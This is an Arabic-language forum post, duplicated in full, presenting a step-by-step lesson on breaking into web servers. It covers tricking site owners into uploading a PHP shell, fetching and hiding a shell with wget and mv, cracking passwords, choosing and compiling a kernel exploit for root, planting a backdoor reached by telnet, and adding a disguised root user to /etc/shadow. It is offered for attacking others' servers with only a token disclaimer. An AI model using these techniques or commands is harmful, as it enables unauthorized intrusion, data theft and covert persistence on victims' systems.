منتدى العراق 4 
درسنا اليوم عن بعض الخدع والحيل الي تستفيد منها عندما تريد ان تخترق موقع او سيرفر او بعد اختراقهم:
نبدا على البركة :
1-
في طريقة كثيييييير يستخدموها زي واحد الله يستر علينا وعليه الي هي يشوف المواقع الي على السيرفر ويشوف له كم موقع وياخذ ايميلات اصحاب هذي المواقع ويكلمهم طبعا ايش راح يقولهم يقول والله عندي ملف صغير ابغى اجربه على موقعك عاد هو واسلوبه الذكي يقدر يخلي صاحب الموقع ينخدع ويرفع له ملف phpshell يعني مسك السيرفر او من البداية يرفع سكربيت بيرل حق تخطي السيف مود حتى لا يشك صاحب الموقع طبعا ياشباب الطريقة هذي مجربه ونااااجحه في الكثير من العرب والله في بعضهم ما يعرفوا يغيروا الباس يكون الباس نفسه الي وضعه صاحب السيرفر لمن حجز له. طبعا معروف ايش تسوي بعد ماترفع phpshell اسحب الداتا الي على السيرفر حتى لو حذف ملفك تكون عندك المعلومات . يعني مثلا بعد ما تسحب كل شي اعطي له كرت من موقع رعودي وقوله شكرا وكثر له كلام حلو وقوله الله يجزاك خير خلاص احذف الملف وقوله مثلا في البداية لمن تجي ترفع انو هذا سكربيت انت برمجته وتبي تجربه وراح تعطيه هو هدية : ) وي قلت لكم الطريقه !!
المهم كل واحد يفكر وراح يجيب طرق يقدر يخدع بيها ناس كبار مثلا (الهندسة الأجتماعية)
2-
حط الأمر [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] wget يعني انت من الشيل سحبت شيل لك من موقعك طيب راح تقولوا أي الفايدة؟؟ اقولكم دحين!!
بعد ما تنزل الملف على السيرفر قم بتغير اسمه حتى يكون مخفي عن العيان وذلك عن طريق الأمر mv
Mv 0.php .0.php أي اضفنا نقطه قبل الأسم حتى يصبح مخفي وبعد كده قوله احذف الملف الي هو رفعه لك طبعا هو ماراح يشوف الملف المخفي وكده انت صرت اذكى منه .
ملاحظه مهمة "بعض السيرفرات لاتسمح بالأمر wget يعني ماتكون لك صلاحية"
3-
طيب شغلت الجون على سيرفر مثلا او على جهازك وجيت بعد فتره لقيته فك لك كم باسورد
طيب ندخل بالـFTP اذا كان همك تغير الصفحه غيرها انت ووجهك طبعا هذي الحركة حقت lamers . اذا كنت تبغى تسيطر على السيرفر ادخل عن طريق برنامج putty مثلا وحط اسم الموقع راح يطلب منك اليوزر والمستخدم حطهم اذا كان متاح له ssh راح تدخل اذا لم يكن مسموح راح يطلع لك رساله يقولك اطلبه من الدعم . فرضنا كان مفتوح طيب هذاك الوقت انت تبغى تاخذ روت على السيرفر وتضمن سيطرتك عليه . في معلومات اساسية لازم تعرفها نوع السيرفر المعالج اصدار النظام والكيرنل ايش رقمه هذي كلها تلاقيها عندما تنفذ الأمر
Cat /etc/issue راح يطلع لك المعلومات الي قلناها فوق والي راح تساعدك في جمع الأكسبلويتات المناسبه طيب فرضنا اصدار الكيرنل كان 2.2.17 يعني راح تفرررح راح تاخذ روت ان شاء الله باكسبلوتات كثيره منها الي جربتته kmod.c هذا يعطيك روت على طول تلاقوه هنا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
سوي wget للأكسبويت
Wget [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وراح ينزل الأكسبلويت على السيرفر سوي له كمبايل gcc بعدين شغله على السيرفر ./kernl
بعدين اكتب id
Opssssss صرت رووت على السيرفر افرح يا عم صرت رووت طيب. ننتقل للخطوه التالية.
4-
بعد الرووت لازم تضمن رجوعك للسيرفر طيب ايش الحل ؟؟
الحل يا سيدي تنزل باك دور على السيرفر backdoor طبعا البك دورات خبرتي فيها قليلة لكن ابشروا بدرس من اخوي القرصان ان شاء الله عن الباك دور طبعا الباك دور مختلف في الأنواع يعني في بعضها تحتاج باسورد في بعضها ترتبط ببورت port معين وبدون باس طبعا غير العمايل الي تسويها الباك دورات مثل تتختفي عن netstat الي تكشف البورتات المفتوحة وغيرها الكثير طبعا راح اجيب لكم باك دور في الموضوع يكون حلو ان شاء الله
بالنسبة لطريقة ربطها بالسيرفر طبعا زي ماقلنا لازم تكون رووت عشان تقدر تربطه. بعد ما تسوي الكمبايل للباك دور تشغله عادي ويكون اتربط طبعا بعدين اذا تبغى تتصل بالسيرفر روح من التيلنت واكتب telnet 212.22.31.31 2323
طبعا البورت انت تحدده قبل ما تسوي كمبايل للباكدور backdoor يعني من نفس الكود.بعد ماتدخل اكتب الأمر id راح يطلع لك سطر uid(0) sid(0) يعني معلومات انك رووت او اكتب الأمر whoami
5-
واختتم بها والي هي تقدر تضيف لك مستخدم في ملف shadow وتحط له صلاحيات الرووت بس اعتقد انو هذي الطريقة سهلة الكشف من الرووت لمن يدخل ويشيك على النظام وايش الي صار عليه. طبعا تكون العملية عن طريق الأمر التالي :
Vi /etc/shadow وراح يبين لك المستخدمين وباسورداتهم مشفره طبعا انت اضيف لك سطر زي الي عن الرووت بس غير اسم المستخدم وحطه اسمه قريب من الأسماء الموجوده ختى لا يكتشف الأسم.
في هذا الدرس المبسط اخترقنا موقع بدون أي ثغره بس شغلنا المخ شويه وجبنا نتائج باهره
ارجوا ان الجميع فهم الدرس ونبي ردود تجبر الخاطر وان شاء الله مااحد يستخدم الي انكتب في الدرس الا للخير ان شاء الله.
م ن ق و ل
للفائده
نبدا على البركة :
1-
في طريقة كثيييييير يستخدموها زي واحد الله يستر علينا وعليه الي هي يشوف المواقع الي على السيرفر ويشوف له كم موقع وياخذ ايميلات اصحاب هذي المواقع ويكلمهم طبعا ايش راح يقولهم يقول والله عندي ملف صغير ابغى اجربه على موقعك عاد هو واسلوبه الذكي يقدر يخلي صاحب الموقع ينخدع ويرفع له ملف phpshell يعني مسك السيرفر او من البداية يرفع سكربيت بيرل حق تخطي السيف مود حتى لا يشك صاحب الموقع طبعا ياشباب الطريقة هذي مجربه ونااااجحه في الكثير من العرب والله في بعضهم ما يعرفوا يغيروا الباس يكون الباس نفسه الي وضعه صاحب السيرفر لمن حجز له. طبعا معروف ايش تسوي بعد ماترفع phpshell اسحب الداتا الي على السيرفر حتى لو حذف ملفك تكون عندك المعلومات . يعني مثلا بعد ما تسحب كل شي اعطي له كرت من موقع رعودي وقوله شكرا وكثر له كلام حلو وقوله الله يجزاك خير خلاص احذف الملف وقوله مثلا في البداية لمن تجي ترفع انو هذا سكربيت انت برمجته وتبي تجربه وراح تعطيه هو هدية : ) وي قلت لكم الطريقه !!
المهم كل واحد يفكر وراح يجيب طرق يقدر يخدع بيها ناس كبار مثلا (الهندسة الأجتماعية)
2-
حط الأمر [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] wget يعني انت من الشيل سحبت شيل لك من موقعك طيب راح تقولوا أي الفايدة؟؟ اقولكم دحين!!
بعد ما تنزل الملف على السيرفر قم بتغير اسمه حتى يكون مخفي عن العيان وذلك عن طريق الأمر mv
Mv 0.php .0.php أي اضفنا نقطه قبل الأسم حتى يصبح مخفي وبعد كده قوله احذف الملف الي هو رفعه لك طبعا هو ماراح يشوف الملف المخفي وكده انت صرت اذكى منه .
ملاحظه مهمة "بعض السيرفرات لاتسمح بالأمر wget يعني ماتكون لك صلاحية"
3-
طيب شغلت الجون على سيرفر مثلا او على جهازك وجيت بعد فتره لقيته فك لك كم باسورد
طيب ندخل بالـFTP اذا كان همك تغير الصفحه غيرها انت ووجهك طبعا هذي الحركة حقت lamers . اذا كنت تبغى تسيطر على السيرفر ادخل عن طريق برنامج putty مثلا وحط اسم الموقع راح يطلب منك اليوزر والمستخدم حطهم اذا كان متاح له ssh راح تدخل اذا لم يكن مسموح راح يطلع لك رساله يقولك اطلبه من الدعم . فرضنا كان مفتوح طيب هذاك الوقت انت تبغى تاخذ روت على السيرفر وتضمن سيطرتك عليه . في معلومات اساسية لازم تعرفها نوع السيرفر المعالج اصدار النظام والكيرنل ايش رقمه هذي كلها تلاقيها عندما تنفذ الأمر
Cat /etc/issue راح يطلع لك المعلومات الي قلناها فوق والي راح تساعدك في جمع الأكسبلويتات المناسبه طيب فرضنا اصدار الكيرنل كان 2.2.17 يعني راح تفرررح راح تاخذ روت ان شاء الله باكسبلوتات كثيره منها الي جربتته kmod.c هذا يعطيك روت على طول تلاقوه هنا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
سوي wget للأكسبويت
Wget [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وراح ينزل الأكسبلويت على السيرفر سوي له كمبايل gcc بعدين شغله على السيرفر ./kernl
بعدين اكتب id
Opssssss صرت رووت على السيرفر افرح يا عم صرت رووت طيب. ننتقل للخطوه التالية.
4-
بعد الرووت لازم تضمن رجوعك للسيرفر طيب ايش الحل ؟؟
الحل يا سيدي تنزل باك دور على السيرفر backdoor طبعا البك دورات خبرتي فيها قليلة لكن ابشروا بدرس من اخوي القرصان ان شاء الله عن الباك دور طبعا الباك دور مختلف في الأنواع يعني في بعضها تحتاج باسورد في بعضها ترتبط ببورت port معين وبدون باس طبعا غير العمايل الي تسويها الباك دورات مثل تتختفي عن netstat الي تكشف البورتات المفتوحة وغيرها الكثير طبعا راح اجيب لكم باك دور في الموضوع يكون حلو ان شاء الله
بالنسبة لطريقة ربطها بالسيرفر طبعا زي ماقلنا لازم تكون رووت عشان تقدر تربطه. بعد ما تسوي الكمبايل للباك دور تشغله عادي ويكون اتربط طبعا بعدين اذا تبغى تتصل بالسيرفر روح من التيلنت واكتب telnet 212.22.31.31 2323
طبعا البورت انت تحدده قبل ما تسوي كمبايل للباكدور backdoor يعني من نفس الكود.بعد ماتدخل اكتب الأمر id راح يطلع لك سطر uid(0) sid(0) يعني معلومات انك رووت او اكتب الأمر whoami
5-
واختتم بها والي هي تقدر تضيف لك مستخدم في ملف shadow وتحط له صلاحيات الرووت بس اعتقد انو هذي الطريقة سهلة الكشف من الرووت لمن يدخل ويشيك على النظام وايش الي صار عليه. طبعا تكون العملية عن طريق الأمر التالي :
Vi /etc/shadow وراح يبين لك المستخدمين وباسورداتهم مشفره طبعا انت اضيف لك سطر زي الي عن الرووت بس غير اسم المستخدم وحطه اسمه قريب من الأسماء الموجوده ختى لا يكتشف الأسم.
في هذا الدرس المبسط اخترقنا موقع بدون أي ثغره بس شغلنا المخ شويه وجبنا نتائج باهره
ارجوا ان الجميع فهم الدرس ونبي ردود تجبر الخاطر وان شاء الله مااحد يستخدم الي انكتب في الدرس الا للخير ان شاء الله.
م ن ق و ل
للفائده
» نتائج تعاطي الحشيش على المهندسين
» شرح عمل منتدى فى بى مجانى شرح صور
» اني خيرتك فاختاري
» قوانين المنتدى السياسي لخاطر قرديلة ناعم
» افتراضي كل ماتحتاج من برامج بعد الفرمتة تعمل على كل الانظمة
» الياهو مسنجر العراقي 9 .. عربي بلهجة عراق
» طريقة سهلة للمبتدئين لأختراق المواقع شرح بالفيديو
» افضل اسطوانة لتعليم الهكر باللغة العربية وفيديو.
» افضل اسطوانة لتعليم الهكر باللغة العربية وفيديو.